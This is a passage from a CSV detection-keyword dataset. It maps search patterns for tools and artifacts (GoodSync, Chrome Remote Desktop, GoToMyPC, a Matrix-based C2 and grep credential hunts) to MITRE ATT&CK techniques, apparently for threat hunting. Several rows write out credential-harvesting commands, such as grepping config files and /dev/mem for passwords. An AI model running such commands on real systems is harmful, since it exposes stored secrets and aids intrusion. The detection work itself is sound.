TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","N/A","10","10","5","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*ckiahbcmlmkpfiijecbpflfahoimklke*",".{0,1000}ckiahbcmlmkpfiijecbpflfahoimklke.{0,1000}","greyware_tool_keyword","Gom VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*https://matrix.org/_matrix/client/r0/rooms/*/send/m.room.message*",".{0,1000}https\:\/\/matrix\.org\/_matrix\/client\/r0\/rooms\/.{0,1000}\/send\/m\.room\.message.{0,1000}","greyware_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in 
goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","0","N/A","N/A","10","","N/A","","","" "*/GoodSync-vsub-Setup.exe*",".{0,1000}\/GoodSync\-vsub\-Setup\.exe.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\GsServer*",".{0,1000}\\CurrentControlSet\\Services\\GsServer.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","#registry","N/A","9","10","N/A","N/A","N/A","N/A" "*\DIRECTORY\BACKGROUND\SHELL\GOODSYNC*",".{0,1000}\\DIRECTORY\\BACKGROUND\\SHELL\\GOODSYNC.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\GoodSync-2*-*.log*",".{0,1000}\\GoodSync\-2.{0,1000}\-.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\GOODSYNC2GO.EXE*",".{0,1000}\\GOODSYNC2GO\.EXE.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data 
Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\GOODSYNC2GO-V*.EXE*",".{0,1000}\\GOODSYNC2GO\-V.{0,1000}\.EXE.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\GoodSync-vsub-Setup.exe*",".{0,1000}\\GoodSync\-vsub\-Setup\.exe.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\gs-runner.exe*",".{0,1000}\\gs\-runner\.exe.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\GS-SERVER.EXE*",".{0,1000}\\GS\-SERVER\.EXE.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\Program Files\SIBER SYSTEMS\GOODSYNC\*",".{0,1000}\\Program\sFiles\\SIBER\sSYSTEMS\\GOODSYNC\\.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\Siber 
Systems\GoodSync\*",".{0,1000}\\Siber\sSystems\\GoodSync\\.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\Users\*\AppData\Local\GoodSync*",".{0,1000}\\Users\\.{0,1000}\\AppData\\Local\\GoodSync.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*>GoodSync<*",".{0,1000}\>GoodSync\<.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*>gs-runner.exe<*",".{0,1000}\>gs\-runner\.exe\<.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*Copy New *gdrive://www.googleapis.com/GS_Sync/*",".{0,1000}Copy\sNew\s.{0,1000}gdrive\:\/\/www\.googleapis\.com\/GS_Sync\/.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*Copy New *sftp://*",".{0,1000}Copy\sNew\s.{0,1000}sftp\:\/\/.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused 
by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*GoodSync Server*",".{0,1000}GoodSync\sServer.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","Service Name","9","10","N/A","N/A","N/A","N/A" "*GoodSync-vsub-2Go-Setup.exe*",".{0,1000}GoodSync\-vsub\-2Go\-Setup\.exe.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","N/A","portable version","9","10","N/A","N/A","N/A","N/A" "*mediator.goodsync.com*",".{0,1000}mediator\.goodsync\.com.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*Program Files\Siber Systems\GoodSync*",".{0,1000}Program\sFiles\\Siber\sSystems\\GoodSync.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*SOFTWARE\Siber Systems\GoodSync\Profiles*",".{0,1000}SOFTWARE\\Siber\sSystems\\GoodSync\\Profiles.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data 
Exfiltration","https://www.goodsync.com/","1","0","#registry","N/A","9","10","N/A","N/A","N/A","N/A" "*temp*\gsync.exe*",".{0,1000}temp.{0,1000}\\gsync\.exe.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "* chrome-remote-desktop@*",".{0,1000}\schrome\-remote\-desktop\@.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.chrome-remote-desktop-session*",".{0,1000}\.chrome\-remote\-desktop\-session.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/system/chrome-remote-desktop@*",".{0,1000}\/system\/chrome\-remote\-desktop\@.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Chrome Remote Desktop\host.json*",".{0,1000}\\Chrome\sRemote\sDesktop\\host\.json.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Google\Chrome Remote Desktop\*",".{0,1000}\\Google\\Chrome\sRemote\sDesktop\\.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pipe\chrome_remote_desktop*",".{0,1000}\\pipe\\chrome_remote_desktop.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A" "*\remote_assistance_host.exe*",".{0,1000}\\remote_assistance_host\.exe.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remoting_desktop.exe*",".{0,1000}\\remoting_desktop\.exe.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remoting_host.exe*",".{0,1000}\\remoting_host\.exe.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\remoting_native_messaging_host.exe*",".{0,1000}\\remoting_native_messaging_host\.exe.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remoting_start_host.exe*",".{0,1000}\\remoting_start_host\.exe.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Product: Chrome Remote Desktop Host*",".{0,1000}\Product\:\sChrome\sRemote\sDesktop\sHost.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "**",".{0,1000}\Installed GoToMyPC*",".{0,1000}\Installed\sGoToMyPC\<\/Data\>.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*=http://www.gotomypc.com/downloads/viewer *",".{0,1000}\=http\:\/\/www\.gotomypc\.com\/downloads\/viewer\s.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - 
TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*api-telemetry.servers.getgo.com*",".{0,1000}api\-telemetry\.servers\.getgo\.com.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ApplicationName'>GoTo Opener*",".{0,1000}ApplicationName\'\>GoTo\sOpener.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ApplicationName'>GoToMyPC Communications*",".{0,1000}ApplicationName\'\>GoToMyPC\sCommunications.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ApplicationName'>GoToMyPC Host Launcher*",".{0,1000}ApplicationName\'\>GoToMyPC\sHost\sLauncher.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ApplicationName'>GoToMyPC Viewer*",".{0,1000}ApplicationName\'\>GoToMyPC\sViewer.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is 
remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*cf3de8f800852490f39fdacbe74627564494235f*",".{0,1000}cf3de8f800852490f39fdacbe74627564494235f.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*G2MScrUtil64.exe*/cr*",".{0,1000}G2MScrUtil64\.exe.{0,1000}\/cr.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*g2mui.exe*/cr*",".{0,1000}g2mui\.exe.{0,1000}\/cr.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*GoTo MyPC Installer.exe*",".{0,1000}GoTo\sMyPC\sInstaller\.exe.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*GOTO MYPC 
INSTALLER.EXE-*.pf*",".{0,1000}GOTO\sMYPC\sINSTALLER\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*GoTo Opener.exe *",".{0,1000}GoTo\sOpener\.exe\s.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*GOTO OPENER.EXE-*.pf*",".{0,1000}GOTO\sOPENER\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Goto.exe*?type=crashpad-handler*",".{0,1000}Goto\.exe.{0,1000}\?type\=crashpad\-handler.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*GoToMyPC_Installation.log*",".{0,1000}GoToMyPC_Installation\.log.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - 
TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*GoToMyPC_Setup.log*",".{0,1000}GoToMyPC_Setup\.log.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*GoToMyPCSetup_x64.msi*",".{0,1000}GoToMyPCSetup_x64\.msi.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*GoToScrUtils.exe*/cr*",".{0,1000}GoToScrUtils\.exe.{0,1000}\/cr.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*launcher-rest-new.live.corecollab.ucc-prod.eva.goto.com*",".{0,1000}launcher\-rest\-new\.live\.corecollab\.ucc\-prod\.eva\.goto\.com.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*novaPDF11PrinterDriver(x64).msi*",".{0,1000}novaPDF11PrinterDriver\(x64\)\.msi.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to 
access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PollServer poll.gotomypc.com*",".{0,1000}PollServer\spoll\.gotomypc\.com.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ServiceName'>GoToMyPC*",".{0,1000}ServiceName\'\>GoToMyPC.{0,1000}","greyware_tool_keyword","GoToMyPC","GoToMyPC is remote desktop software that allows users to access computers remotely using a web browser","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","N/A","RMM","https://www.gotomypc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*gpg --list-keys*",".{0,1000}gpg\s\-\-list\-keys.{0,1000}","greyware_tool_keyword","gpg","List gpg keys for privilege escalation","T1553.002","TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","4","8","N/A","N/A","N/A","N/A" "*grep -* *DBPassword*",".{0,1000}grep\s\-.{0,1000}\s.{0,1000}DBPassword.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. 
# search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A" "*grep *password /var/www*",".{0,1000}grep\s.{0,1000}password\s\/var\/www.{0,1000}","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*grep *password.* /etc/*.conf*",".{0,1000}grep\s.{0,1000}password\..{0,1000}\s\/etc\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A" "*grep :0: /etc/passwd*",".{0,1000}grep\s\:0\:\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","grep","Look for users with a UID of 0","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*grep -i pass *",".{0,1000}grep\s\-i\spass\s.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A" "*grep -i user 
*",".{0,1000}grep\s\-i\suser\s.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://gtfobins.github.io/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A" "*grep -R db_passwd*",".{0,1000}grep\s\-R\sdb_passwd.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A" "*grep -roiE *password*",".{0,1000}grep\s\-roiE\s.{0,1000}password.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. 
# search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A" "*grep*|pwd=|passwd=|password=*",".{0,1000}grep.{0,1000}\|pwd\=\|passwd\=\|password\=.{0,1000}","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*grep*password|pwd|pass*",".{0,1000}grep.{0,1000}password\|pwd\|pass.{0,1000}","greyware_tool_keyword","grep","search for passwords","T1213 - T1081","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*strings -n * /dev/mem | grep -i pass*",".{0,1000}strings\s\-n\s.{0,1000}\s\/dev\/mem\s\|\sgrep\s\-i\spass.{0,1000}","greyware_tool_keyword","grep","search for passwords in memory and core dumps","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "* GS_STTY_INIT_HACK*",".{0,1000}\sGS_STTY_INIT_HACK.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
